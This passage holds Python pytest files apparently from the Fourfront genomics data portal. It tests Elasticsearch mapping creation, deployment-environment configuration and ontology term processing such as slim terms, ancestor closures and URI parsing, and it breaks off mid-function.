notice_pytest_fixtures(app_settings, app, workbook)
@pytest.mark.parametrize('item_type', ORDER)
def test_create_mapping(registry, item_type):
"""
This test does not actually use elasticsearch
Only tests the mappings generated from schemas
"""
mapping = type_mapping(registry[TYPES], item_type)
assert mapping
type_info = registry[TYPES].by_item_type[item_type]
schema = type_info.schema
embeds = add_default_embeds(item_type, registry[TYPES], type_info.embedded_list, schema)
# assert that all embeds exist in mapping for the given type
for embed in embeds:
mapping_pointer = mapping
split_embed = embed.split('.')
for idx, split_ in enumerate(split_embed):
# see if this is last level of embedding- may be a field or object
if idx == len(split_embed) - 1:
if 'properties' in mapping_pointer and split_ in mapping_pointer['properties']:
final_mapping = mapping_pointer['properties']
else:
final_mapping = mapping_pointer
if split_ != '*':
assert split_ in final_mapping
else:
assert 'properties' in final_mapping or final_mapping.get('type') == 'object'
else:
assert split_ in mapping_pointer['properties']
mapping_pointer = mapping_pointer['properties'][split_]
def test_create_mapping_item_order(registry):
# make sure every item type name is represented in the item ordering
for i_type in registry[COLLECTIONS].by_item_type:
# ignore "testing" types
if i_type.startswith('testing_'):
continue
assert registry[COLLECTIONS][i_type].type_info.name in ITEM_INDEX_ORDER
class MockedCommandArgs:
def __init__(self, wipe_es=None, skip=None, strict=None, clear_queue=None):
self.wipe_es = wipe_es
self.skip = skip
self.strict = strict
self.clear_queue = clear_queue
class MockedLog:
def __init__(self):
self.log = []
def info(self, msg):
self.log.append(('info', msg))
def error(self, msg):
self.log.append(('error', msg))
# These next are more extensively tested in dcicutils.
# This is just plausibility checking that we've received things OK.
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-blue'))
def test_get_deployment_config_staging():
""" Tests get_deployment_config in the new staging case """
my_env = create_mapping_on_deploy.get_my_env('ignored-for-mock')
assert my_env == 'fourfront-blue'
cfg = CreateMappingOnDeployManager.get_deploy_config(env=my_env, args=MockedCommandArgs(), log=MockedLog())
assert cfg['ENV_NAME'] == my_env # sanity
assert cfg['SKIP'] is False
assert cfg['WIPE_ES'] is True
assert cfg['STRICT'] is True
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-green'))
def test_get_deployment_config_prod():
""" Tests get_deployment_config in the new production case """
my_env = create_mapping_on_deploy.get_my_env('ignored-for-mock')
assert my_env == 'fourfront-green'
with pytest.raises(RuntimeError):
CreateMappingOnDeployManager.get_deploy_config(env=my_env, args=MockedCommandArgs(), log=MockedLog())
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-hotseat'))
def test_get_deployment_config_hotseat():
""" Tests get_deployment_config in the hotseat case with a new-style ecosystem. """
my_env = create_mapping_on_deploy.get_my_env('ignored-for-mock')
assert my_env == 'fourfront-hotseat'
cfg = CreateMappingOnDeployManager.get_deploy_config(env=my_env, args=MockedCommandArgs(), log=MockedLog())
assert cfg['ENV_NAME'] == my_env # sanity
assert cfg['SKIP'] is True # The other values (WIPE_ES and STRICT) don't matter if this is set.
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-mastertest'))
def test_get_deployment_config_mastertest():
""" Tests get_deployment_config in the hotseat case with a new-style ecosystem. """
my_env = create_mapping_on_deploy.get_my_env('ignored-for-mock')
assert my_env == 'fourfront-mastertest'
cfg = CreateMappingOnDeployManager.get_deploy_config(env=my_env, args=MockedCommandArgs(), log=MockedLog())
assert cfg['ENV_NAME'] == my_env # sanity
assert cfg['SKIP'] is False
assert cfg['WIPE_ES'] is True
assert cfg['STRICT'] is False
class Simulation:
def __init__(self, mocked_app, expect_check_first=False, expect_purge_queue=False, expect_strict=False):
self.run_has_been_called = False
self.mocked_app = mocked_app
self.expect_check_first = expect_check_first
self.expect_purge_queue = expect_purge_queue
self.expect_strict = expect_strict
def __str__(self):
return ("<{cls} run {called} expecting cf={cf} pq={pq} es={es} {id}>"
.format(cls=self.__class__.__name__, called="CALLED" if self.run_has_been_called else "UNCALLED",
cf=self.expect_check_first, pq=self.expect_purge_queue, es=self.expect_strict, id=id(self)))
def __repr__(self):
return self.__str__()
def mocked_run_create_mapping(self, app, check_first=False, strict=False, purge_queue=False, item_order=None,
**kwargs):
self.run_has_been_called = True
assert kwargs == {}, "mocked_run_create_mapping needs adjusting. It doesn't expect these keywords: %s" % kwargs
assert app == self.mocked_app, "Mocked app was not as expected: %s" % app
# check_first is (not WIPE_ES)
assert check_first is self.expect_check_first, "check_first is not False: %s" % check_first
# purge_queue is whether --clear-queue was in command args
assert bool(purge_queue) is self.expect_purge_queue, (
"bool(purge_queue) is not False. purge_queue=%s" % purge_queue)
# This should be a constant for our purposes
assert item_order == ITEM_INDEX_ORDER, "item_order was not as expected: %s" % item_order
# strict is the STRICT argument
assert strict is self.expect_strict, "strict is not False: %s" % strict
@patch('encoded.commands.create_mapping_on_deploy.log', MockedLog())
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.run_create_mapping')
def test_run_create_mapping_production(mock_run_create_mapping, app):
simulation = Simulation(mocked_app=app) # Expectations don't matter because we're not expecting to get called.
mocked_log = create_mapping_on_deploy.log
try:
mock_run_create_mapping.side_effect = simulation.mocked_run_create_mapping
_run_create_mapping(app, MockedCommandArgs())
except SystemExit as e:
print(e)
assert e.code == 1
assert simulation.run_has_been_called is False
assert mocked_log.log == [
('info', 'Environment fourfront-green is currently the production environment.'
' Something is definitely wrong. We never deploy there, we always CNAME swap.'
' This deploy cannot proceed. DeploymentFailure will be raised.'),
('error', 'Exception encountered while gathering deployment information or running create_mapping'),
('error', 'DeploymentFailure: Tried to run create_mapping_on_deploy on production.'),
]
@patch('encoded.commands.create_mapping_on_deploy.log', MockedLog())
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-blue'))
@patch('encoded.commands.create_mapping_on_deploy.run_create_mapping')
def test_run_create_mapping_staging(mock_run_create_mapping, app):
simulation = Simulation(mocked_app=app, expect_check_first=False, expect_purge_queue=False, expect_strict=True)
mocked_log = create_mapping_on_deploy.log
exit_condition = None
try:
mock_run_create_mapping.side_effect = simulation.mocked_run_create_mapping
_run_create_mapping(app, MockedCommandArgs())
except SystemExit as e:
exit_condition = e
print(exit_condition)
except Exception as e:
print("log =", mocked_log.log)
raise AssertionError("Unexpected error exit (%s): %s" % (e.__class__.__name__, e))
assert simulation.run_has_been_called is True
assert mocked_log.log == [
('info', 'Environment fourfront-blue is currently the staging environment. Processing mode: STRICT,WIPE_ES'),
('info', 'Calling run_create_mapping for env fourfront-blue.')
]
assert exit_condition, "Unexpected non-error exit."
assert exit_condition.code == 0
@patch('encoded.commands.create_mapping_on_deploy.log', MockedLog())
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-hotseat'))
@patch('encoded.commands.create_mapping_on_deploy.run_create_mapping')
def test_run_create_mapping_hotseat(mock_run_create_mapping, app):
simulation = Simulation(mocked_app=app) # Expectations don't matter because we're not expecting to get called.
mocked_log = create_mapping_on_deploy.log
try:
mock_run_create_mapping.side_effect = simulation.mocked_run_create_mapping
_run_create_mapping(app, MockedCommandArgs())
except SystemExit as e:
print(e)
assert e.code == 0
assert simulation.run_has_been_called is False
assert mocked_log.log == [
('info', 'Environment fourfront-hotseat is a hotseat test environment. Processing mode: SKIP'),
('info', 'NOT calling run_create_mapping for env fourfront-hotseat.')
]
@patch('encoded.commands.create_mapping_on_deploy.log', MockedLog())
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-mastertest'))
@patch('encoded.commands.create_mapping_on_deploy.run_create_mapping')
def test_run_create_mapping_mastertest(mock_run_create_mapping, app):
simulation = Simulation(mocked_app=app, expect_check_first=False, expect_purge_queue=False, expect_strict=False)
mocked_log = create_mapping_on_deploy.log
try:
mock_run_create_mapping.side_effect = simulation.mocked_run_create_mapping
_run_create_mapping(app, MockedCommandArgs())
except SystemExit as e:
print(e)
assert e.code == 0
assert simulation.run_has_been_called is True
assert mocked_log.log == [
('info', 'Environment fourfront-mastertest is a non-hotseat test environment. Processing mode: WIPE_ES'),
('info', 'Calling run_create_mapping for env fourfront-mastertest.')
]
@patch('encoded.commands.create_mapping_on_deploy.log', MockedLog())
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-mastertest'))
@patch('encoded.commands.create_mapping_on_deploy.run_create_mapping')
def test_run_create_mapping_mastertest_with_clear_queue(mock_run_create_mapping, app):
simulation = Simulation(mocked_app=app, expect_check_first=False, expect_purge_queue=True, expect_strict=False)
mocked_log = create_mapping_on_deploy.log
try:
mock_run_create_mapping.side_effect = simulation.mocked_run_create_mapping
_run_create_mapping(app, MockedCommandArgs(clear_queue=True))
except SystemExit as e:
print(e)
assert e.code == 0
assert simulation.run_has_been_called is True
assert mocked_log.log == [
('info', 'Environment fourfront-mastertest is a non-hotseat test environment. Processing mode: WIPE_ES'),
('info', 'Calling run_create_mapping for env fourfront-mastertest.')
]
@patch("snovault.elasticsearch.indexer_queue.QueueManager.add_uuids")
def test_run_create_mapping_with_upgrader(mock_add_uuids, testapp, workbook):
"""
Test for catching items in need of upgrading when running
create_mapping.
Indexer queue method mocked to check correct calls, so no items
actually indexed/upgraded.
"""
app = testapp.app
type_to_upgrade = "Biosample"
search_query = "/search/?type=" + type_to_upgrade + "&frame=object"
search = testapp.get(search_query, status=200).json["@graph"]
item_type_uuids = sorted([x["uuid"] for x in search])
# No schema version change, so nothing needs indexing
run_create_mapping(app, check_first=True)
(_, uuids_to_index), _ = mock_add_uuids.call_args
assert not uuids_to_index
# Change schema version in registry so all posted items of this type
# "need" to be upgraded
registry_schema = app.registry[TYPES][type_to_upgrade].schema
schema_version_default = registry_schema["properties"]["schema_version"]["default"]
updated_schema_version = str(int(schema_version_default) + 1)
registry_schema["properties"]["schema_version"]["default"] = updated_schema_version
run_create_mapping(app, check_first=True)
(_, uuids_to_index), _ = mock_add_uuids.call_args
assert sorted(uuids_to_index) == item_type_uuids
# Revert item type schema version
registry_schema["properties"]["schema_version"]["default"] = schema_version_default
```
#### File: encoded/tests/test_fourfront_submission.py
```python
import pytest
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
# test that the right fields are in place for metadata submission on FF.
# specifically, a valid submits_for lab and valid award
def test_user_with_submitter(testapp, submitter):
assert len(submitter['submits_for']) > 0
lab = submitter['submits_for'][0]['@id']
lab_res = testapp.get(lab, status=200)
assert len(lab_res.json['awards']) > 0
award = lab_res.json['awards'][0]['@id']
testapp.get(award, status=200)
```
#### File: encoded/tests/test_generate_ontology.py
```python
import json
import os
import pytest
from collections import OrderedDict
from rdflib import URIRef
from unittest import mock
from ..commands import generate_ontology as go
from ..commands.owltools import Owler
pytestmark = [pytest.mark.setone, pytest.mark.working]
def test_parse_args_defaults():
args = []
args = go.parse_args(args)
assert args.ontology == 'all'
assert args.key is None
assert args.env == 'data'
@pytest.fixture
def connection():
return {
"server": "https://data.4dnucleome.org/",
"key": "testkey",
"secret": "testsecret"
}
@pytest.fixture
def slim_terms():
return [
{
"uuid": "111119bc-8535-4448-903e-854af460a233",
"term_name": "ectoderm",
"term_id": "UBERON:0000924",
"is_slim_for": "developmental",
},
{
"uuid": "111122bc-8535-4448-903e-854af460a233",
"preferred_name": "3D chromatin structure",
"term_name": "chromosome conformation identification objective",
"term_id": "OBI:0001917",
"is_slim_for": "assay"
}
]
def test_connect2server(connection):
# parameters we pass in don't really matter
key = "{'server': 'https://data.4dnucleome.org/', 'key': 'testkey', 'secret': 'testsecret'}"
with mock.patch('encoded.commands.generate_ontology.get_authentication_with_server', return_value=connection):
retval = go.connect2server(None, key)
assert retval == connection
# see ontology schema for full schema
# now synonym_terms and definition_terms are fully embedded
all_ontology = [{'download_url': 'http://www.ebi.ac.uk/efo/efo_inferred.owl',
'synonym_terms': [
'/ontology-terms/111111bc-8535-4448-903e-854af460a233/',
'/ontology-terms/111112bc-8535-4448-903e-854af460a233/'],
'@id': '/ontologys/530006bc-8535-4448-903e-854af460b254/',
'@type': ['Ontology', 'Item'],
'definition_terms': [
'/ontology-terms/111115bc-8535-4448-903e-854af460a233/',
'/ontology-terms/111116bc-8535-4448-903e-854af460a233/'],
'namespace_url': 'http://www.ebi.ac.uk/efo/',
'ontology_prefix': 'EFO',
'uuid': '530006bc-8535-4448-903e-854af460b254',
'ontology_name': 'Experimental Factor Ontology'
},
{'ontology_name': 'Uberon',
'@type': ['Ontology', 'Item'],
'ontology_prefix': 'UBERON',
'namespace_url': 'http://purl.obolibrary.org/obo/',
'download_url': 'http://purl.obolibrary.org/obo/uberon/composite-metazoan.owl',
'@id': '/ontologys/530016bc-8535-4448-903e-854af460b254/',
'definition_terms': ['/ontology-terms/111116bc-8535-4448-903e-854af460a233/'],
'uuid': '530016bc-8535-4448-903e-854af460b254',
},
{'ontology_name': 'Ontology for Biomedical Investigations',
'@type': ['Ontology', 'Item'],
'ontology_prefix': 'OBI',
'namespace_url': 'http://purl.obolibrary.org/obo/',
'download_url': 'http://purl.obolibrary.org/obo/obi.owl',
'@id': '/ontologys/530026bc-8535-4448-903e-854af460b254/',
'definition_terms': [
{'term_name': 'definition',
'@type': ['OntologyTerm', 'Item'],
'term_id': 'IAO:0000115',
'@id': '/ontology-terms/111116bc-8535-4448-903e-854af460a233/',
'uuid': '111116bc-8535-4448-903e-854af460a233',
'term_url': 'http://purl.obolibrary.org/obo/IAO_0000115'
}
],
'uuid': '530026bc-8535-4448-903e-854af460b254',
'synonym_terms': [
{'term_name': 'alternative term',
'@type': ['OntologyTerm', 'Item'],
'term_id': 'IAO:0000118',
'@id': '/ontology-terms/111117bc-8535-4448-903e-854af460a233/',
'uuid': '111117bc-8535-4448-903e-854af460a233',
'term_url': 'http://purl.obolibrary.org/obo/IAO_0000118'
},
{'term_name': 'alternative term',
'@type': ['OntologyTerm', 'Item'],
'term_id': 'IAO:0000118',
'@id': '/ontology-terms/111117bc-8535-4448-903e-854af460a233/',
'uuid': '111117bc-8535-4448-903e-854af460a233',
'term_url': 'http://purl.obolibrary.org/obo/IAO_0000118'
}
]
}]
def get_fdn_ontology_side_effect(*args, **kwargs):
for i, arg in enumerate(args):
print('ARG', i, ' = ', arg)
if args[0] is not None:
return all_ontology[0]
else:
return all_ontology
def test_get_ontologies_all(connection):
prefixes = ['EFO', 'UBERON', 'OBI']
with mock.patch('encoded.commands.generate_ontology.search_metadata', return_value=all_ontology):
ont_list = 'all'
ontologies = go.get_ontologies(connection, ont_list)
assert len(ontologies) == 3
for ont in ontologies:
assert ont['ontology_prefix'] in prefixes
def test_get_ontologies_one(connection):
prefix = 'EFO'
with mock.patch('encoded.commands.generate_ontology.get_metadata', side_effect=get_fdn_ontology_side_effect):
ont_list = 'EFO'
ontologies = go.get_ontologies(connection, ont_list)
assert len(ontologies) == 1
assert ontologies[0]['ontology_prefix'] == prefix
def test_get_ontologies_not_in_db(connection):
prefix = 'EFO'
all_ontology.append({'@type': ['Error', 'Item'], 'ontology_prefix': 'FAKE'})
with mock.patch('encoded.commands.generate_ontology.get_metadata',
return_value={'@type': ['Error', 'Item'], 'ontology_prefix': 'FAKE'}):
ont_list = 'FAKE'
ontologies = go.get_ontologies(connection, ont_list)
assert not ontologies
@pytest.fixture
def slim_term_list():
# see ontology_term schema for full schema
return [{'term_id': 'a_term1', 'uuid': 'uuida1', 'is_slim_for': 'assay'},
{'term_id': 'a_term2', 'uuid': 'uuida2', 'is_slim_for': 'assay'},
{'term_id': 'd_term1', 'uuid': 'uuidd1', 'is_slim_for': 'developmental'}]
@pytest.fixture
def slim_terms_by_ont(slim_term_list):
return [
[slim_term_list[0],
slim_term_list[1]],
[slim_term_list[2]],
None,
None,
None
]
@pytest.fixture
def term_w_closure():
return {'term_id': '1', 'uuid': 'uuid1',
'closure': ['id1', 'id2', 'a_term1']}
@pytest.fixture
def terms_w_closures(term_w_closure):
# term with 2 slims
term_w_two = term_w_closure.copy()
term_w_two['term_id'] = '4'
term_w_two['uuid'] = 'uuid2'
term_w_two['closure'] = term_w_closure['closure'].copy()
term_w_two['closure'].append('a_term2')
# term w closure but no slim terms
term_wo_slim = term_w_closure.copy()
term_wo_slim['term_id'] = '5'
term_wo_slim['uuid'] = 'uuid5'
term_wo_slim['closure'] = term_w_closure['closure'].copy()
term_wo_slim['closure'].pop()
# term with both 'closure' and 'closure_with_develops_from' both with the same slim
term_with_both = term_w_closure.copy()
term_with_both['term_id'] = '3'
term_with_both['uuid'] = 'uuid3'
term_with_both['closure_with_develops_from'] = ['d_term1']
print(term_with_both)
# term with 'closure_with_develops_from' slim term'
term_cwdf = term_with_both.copy()
term_cwdf['term_id'] = '2'
term_cwdf['uuid'] = 'uuid2'
del term_cwdf['closure']
# term with no closures
term_w_none = term_cwdf.copy()
term_w_none['term_id'] = '6'
term_w_none['uuid'] = 'uuid6'
del term_w_none['closure_with_develops_from']
return [term_w_closure, term_cwdf, term_with_both,
term_w_two, term_wo_slim, term_w_none]
@pytest.fixture
def terms():
return {
'a_term1': {
'term_id': 'a_term1',
'term_name': 'name1',
'all_parents': []
},
'id2': {
'term_id': 'id2',
'term_name': 'name2',
'parents': ['a_term1', 'ObsoleteClass'],
'all_parents': ['a_term1']
},
'id3': {
'term_id': 'id3',
'term_name': 'obsolete name',
'relationships': ['id2'],
'all_parents': ['id2']
},
'id4': {
'term_id': 'id4',
'term_name': 'Obsolete name',
'relationships': ['a_term1', 'id2'],
'all_parents': ['a_term11', 'id2']
},
'd_term1': {
'term_id': 'd_term1',
'term_name': '',
'all_parents': ['id4']
},
'id6': {
'term_id': 'id6',
'develops_from': ['id7'],
'parents': ['id2'],
'all_parents': []
},
'id7': {
'term_id': 'id7',
'parents': ['d_term1'],
'all_parents': ['id6']
},
'id8': {
'term_id': 'id8',
'develops_from': ['id7', 'id3'],
'all_parents': ['id7', 'id3']
},
'id9': {
'term_id': 'id9',
'has_part_inverse': ['id3'],
'develops_from': ['id3'],
'all_parents': ['id10']
}
}
@pytest.fixture
def syn_uris():
return ['http://www.ebi.ac.uk/efo/alternative_term',
'http://www.geneontology.org/formats/oboInOwl#hasExactSynonym',
'http://purl.obolibrary.org/obo/IAO_0000118']
@pytest.fixture
def syn_uris_as_URIRef(syn_uris):
return [go.convert2namespace(uri) for uri in syn_uris]
def test_get_slim_terms(connection, slim_terms_by_ont):
present = ['developmental', 'assay']
absent = ['organ', 'system', 'cell']
test_slim_terms = slim_terms_by_ont
with mock.patch('encoded.commands.generate_ontology.search_metadata',
side_effect=test_slim_terms):
terms = go.get_slim_terms(connection)
assert len(terms) == 3
for term in terms:
assert term['is_slim_for'] in present
assert term['is_slim_for'] not in absent
def test_add_slim_to_term(terms_w_closures, slim_term_list):
slim_ids = ['a_term1', 'd_term1', 'a_term2']
for i, term in enumerate(terms_w_closures):
test_term = go.add_slim_to_term(term, slim_term_list)
assert test_term['term_id'] == str(i + 1)
if i < 2:
assert len(test_term['slim_terms']) == 1
assert test_term['slim_terms'][0] == slim_ids[i]
elif i <= 3:
assert len(test_term['slim_terms']) == 2
for t in test_term['slim_terms']:
assert t in slim_ids
elif i > 3:
assert 'slim_terms' not in test_term
def test_add_slim_terms(terms, slim_term_list):
terms = go.add_slim_terms(terms, slim_term_list)
print(terms)
for tid, term in terms.items():
if tid == 'id6':
assert len(term['slim_terms']) == 2
assert 'd_term1' in term['slim_terms']
assert 'a_term1' in term['slim_terms']
elif tid == 'id9':
assert 'slim_terms' not in term
else:
assert len(term['slim_terms']) == 1
if tid in ['a_term1', 'id2', 'id3', 'id4']:
assert term['slim_terms'][0] == 'a_term1'
elif tid in ['d_term1', 'id7', 'id8']:
assert term['slim_terms'][0] == 'd_term1'
def test_remove_obsoletes_and_unnamed_obsoletes(terms):
db_terms = []
terms['id10'] = {'term_id': 'id10', 'term_name': 'new_term that is deprecated'}
ids = ['a_term1', 'id2', 'id3', 'id4', 'd_term1', 'id6', 'id7', 'id8', 'id9', 'id10']
deprecated = 'id10'
for i in ids:
assert i in terms
terms = go.remove_obsoletes_and_unnamed(terms, deprecated, db_terms)
remaining = ids.pop(0)
assert remaining in terms
for i in ids:
assert i not in terms
def check_if_URIRef(uri):
return isinstance(uri, URIRef)
def test_convert2namespace(syn_uris):
for uri in syn_uris:
ns = go.convert2namespace(uri)
assert check_if_URIRef(ns)
assert str(ns) == uri
def test_get_syndef_terms_as_uri(syn_uris):
asrdf = [True, False]
for rdf in asrdf:
uris = go.get_syndef_terms_as_uri(all_ontology[2], 'synonym_terms', rdf)
if rdf:
for uri in uris:
assert check_if_URIRef(uri)
assert str(uri) in syn_uris
else:
assert str(uri) in syn_uris
def test_get_synonym_term_uris_no_ontology():
with mock.patch('encoded.commands.generate_ontology.get_syndef_terms_as_uri',
return_value=[]):
synterms = go.get_synonym_term_uris('ontologys/FAKE')
assert not synterms
def test_get_definition_term_uris_no_ontology():
with mock.patch('encoded.commands.generate_ontology.get_syndef_terms_as_uri',
return_value=[]):
synterms = go.get_definition_term_uris('ontologys/FAKE')
assert not synterms
def test_get_synonym_term_uris(syn_uris, syn_uris_as_URIRef):
asrdf = [True, False]
with mock.patch('encoded.commands.generate_ontology.get_syndef_terms_as_uri',
return_value=syn_uris_as_URIRef):
for rdf in asrdf:
uris = go.get_synonym_term_uris('ontid', rdf)
if rdf:
for uri in uris:
assert check_if_URIRef(uri)
assert str(uri) in syn_uris
else:
assert str(uri) in syn_uris
def test_get_definition_term_uris(syn_uris, syn_uris_as_URIRef):
asrdf = [True, False]
with mock.patch('encoded.commands.generate_ontology.get_syndef_terms_as_uri',
return_value=syn_uris_as_URIRef):
for rdf in asrdf:
uris = go.get_synonym_term_uris('ontid', rdf)
if rdf:
for uri in uris:
assert check_if_URIRef(uri)
assert str(uri) in syn_uris
else:
assert str(uri) in syn_uris
@pytest.yield_fixture
def owler():
with mock.patch.object(go, 'Owler') as mocked:
yield mocked
@pytest.fixture
def returned_synonyms():
return [
[], [],
['testsyn1'], ['testsyn1'],
['testsyn1', 'testsyn2'], ['testsyn1', 'testsyn2']
]
def test_get_synonyms_and_definitions(owler, returned_synonyms):
checks = ['testsyn1', 'testsyn2']
with mock.patch('encoded.commands.generate_ontology.getObjectLiteralsOfType',
side_effect=returned_synonyms):
class_ = 'test_class'
synonym_terms = ['1']
definition_terms = ['1']
for i in range(int(len(returned_synonyms) / 2)):
synonyms = go.get_synonyms(class_, owler, synonym_terms)
definitions = go.get_definitions(class_, owler, definition_terms)
assert synonyms == definitions
if i == 0:
assert not synonyms
else:
assert len(synonyms) == i
for syn in synonyms:
assert syn in checks
def test_iterative_parents(terms):
for tid, term in terms.items():
parents = []
oks = []
if 'all_parents' in term:
parents = go.iterative_parents(term['all_parents'], terms, 'all_parents')
if tid in ['a_term1', 'id6', 'id9']:
assert not parents
if tid == 'id2':
oks = ['a_term1']
assert len(parents) == 1
if tid in ['id3', 'id4']:
oks = ['a_term1', 'id2']
assert len(parents) == 2
if tid == 'd_term1':
oks = ['a_term1', 'id2', 'id4']
assert len(parents) == 3
if tid == 'id7':
oks = ['id6']
assert len(parents) == 1
if tid == 'id8':
oks = ['id6', 'id7', 'a_term1', 'id2', 'id3']
assert len(parents) == 5
if oks:
assert [_id in oks for _id in parents]
def test_get_all_ancestors(terms):
for tid, term in terms.items():
term['development'] = term['all_parents'].copy() # adding development to all terms
for tid, term in terms.items():
term = go.get_all_ancestors(term, terms, 'all_parents')
term = go.get_all_ancestors(term, terms, 'development')
# check they're the same - no need to check both anymore
assert term['closure'] == term['closure_with_develops_from']
closure = term['closure']
okids = []
assert tid in closure # checks that the term id is included
if tid in ['a_term1', 'id6', 'id9']:
assert len(closure) == 1
if tid in ['id2', 'id7']:
assert len(closure) == 2
if tid == 'id2':
okids = ['a_term1']
else:
okids = ['id6']
if tid in ['id3', 'id4']:
assert len(closure) == 3
okids = ['a_term1', 'id2']
if tid == 'd_term1':
assert len(closure) == 4
okids = ['a_term1', 'id2', 'id4']
if tid == 'id8':
assert len(closure) == 6
okids = ['id6', 'id7', 'a_term1', 'id2', 'id3']
if okids:
assert [_id in okids for _id in closure]
def test_combine_all_parents_w_no_parents():
term = {'term_id': 'id1'}
term = go._combine_all_parents(term)
assert not term['all_parents'] # both should be empty lists
assert not term['development']
def test_combine_all_parents_w_empty_parents():
term = {'term_id': 'id1', 'parents': [], 'relationships': [],
'develops_from': [], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert not term['all_parents'] # both should be empty lists
assert not term['development']
def test_combine_all_parents_w_one_parent():
term = {'term_id': 'id1', 'parents': ['id2'], 'relationships': [],
'develops_from': [], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert len(term['all_parents']) == 1
assert term['all_parents'][0] == 'id2'
assert term['development'] == term['all_parents']
def test_combine_all_parents_w_two_parents():
term = {'term_id': 'id1', 'parents': ['id2', 'id3'], 'relationships': [],
'develops_from': [], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert len(term['all_parents']) == 2
assert 'id2' in term['all_parents']
assert 'id3' in term['all_parents']
assert sorted(term['development']) == sorted(term['all_parents'])
def test_combine_all_parents_w_two_same_parents():
term = {'term_id': 'id1', 'parents': ['id2', 'id2'], 'relationships': [],
'develops_from': [], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert len(term['all_parents']) == 1
assert term['all_parents'][0] == 'id2'
assert term['development'] == term['all_parents']
def test_combine_all_parents_w_parent_and_relationship_diff():
term = {'term_id': 'id1', 'parents': ['id2'], 'relationships': ['id3'],
'develops_from': [], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert len(term['all_parents']) == 2
assert 'id2' in term['all_parents']
assert 'id3' in term['all_parents']
assert sorted(term['development']) == sorted(term['all_parents'])
def test_combine_all_parents_w_parent_and_relationship_same():
term = {'term_id': 'id1', 'parents': ['id2'], 'relationships': ['id2'],
'develops_from': [], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert len(term['all_parents']) == 1
assert term['all_parents'][0] == 'id2'
assert term['development'] == term['all_parents']
def test_combine_all_parents_w_parent_and_develops_from_diff():
term = {'term_id': 'id1', 'parents': ['id2'], 'relationships': [],
'develops_from': ['id3'], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert len(term['all_parents']) == 1
assert len(term['development']) == 2
assert term['all_parents'][0] == 'id2'
assert 'id2' in term['development']
assert 'id3' in term['development']
def test_combine_all_parents_w_parent_and_develops_from_same():
term = {'term_id': 'id1', 'parents': ['id2'], 'relationships': [],
'develops_from': ['id2'], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert len(term['all_parents']) == 1
assert term['all_parents'][0] == 'id2'
assert term['development'] == term['all_parents']
def test_combine_all_parents_w_only_develops_from():
term = {'term_id': 'id1', 'parents': [], 'relationships': [],
'develops_from': ['id2'], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert not term['all_parents']
assert len(term['development']) == 1
assert term['development'][0] == 'id2'
def test_combine_all_parents_w_has_part_inverse_only():
term = {'term_id': 'id1', 'parents': [], 'relationships': [],
'develops_from': [], 'has_part_inverse': ['id2']}
term = go._combine_all_parents(term)
assert not term['all_parents'] # both should be empty lists
assert not term['development']
def test_combine_all_parents_w_has_part_inverse_to_exclude():
term = {'term_id': 'id1', 'parents': [], 'relationships': [],
'develops_from': ['id2'], 'has_part_inverse': ['id2']}
term = go._combine_all_parents(term)
assert not term['all_parents'] # both should be empty lists
assert not term['development']
def test_combine_all_parents_w_has_part_inverse_to_exclude_plus_others():
term = {'term_id': 'id1', 'parents': ['id2'], 'relationships': [],
'develops_from': ['id3', 'id4', 'id5'], 'has_part_inverse': ['id4', 'id5', 'id6']}
term = go._combine_all_parents(term)
assert len(term['all_parents']) == 1
assert len(term['development']) == 2
assert term['all_parents'][0] == 'id2'
assert 'id2' in term['development']
assert 'id3' in term['development']
def test_has_human_empty():
ll = []
assert not go._has_human(ll)
def test_has_human_no_human():
ll = ['http://purl.obolibrary.org/obo/BFO_0000051']
assert not go._has_human(ll)
def test_has_human_human():
ll = ['http://purl.obolibrary.org/obo/BFO_0000051', 'http://purl.obolibrary.org/obo/NCBITaxon_9606']
assert go._has_human(ll)
def test_has_human_uriref_human():
uri = 'http://purl.obolibrary.org/obo/NCBITaxon_9606'
uri = go.convert2URIRef(uri)
ll = [uri]
assert go._has_human(ll)
def test_get_termid_from_uri_no_uri():
uri = ''
assert not go.get_termid_from_uri(uri)
def test_get_termid_from_uri_valid_uri():
uri = 'http://www.ebi.ac.uk/efo/EFO_0002784'
tid = go.get_termid_from_uri(uri)
assert tid == 'EFO:0002784'
def test_get_termid_from_uri_funky_uri1():
uri = 'http://www.ebi.ac.uk/efo/EFO_UFO_0002784'
tid = go.get_termid_from_uri(uri)
assert tid == 'EFO:UFO:0002784'
def test_get_termid_from_uri_funky_uri2():
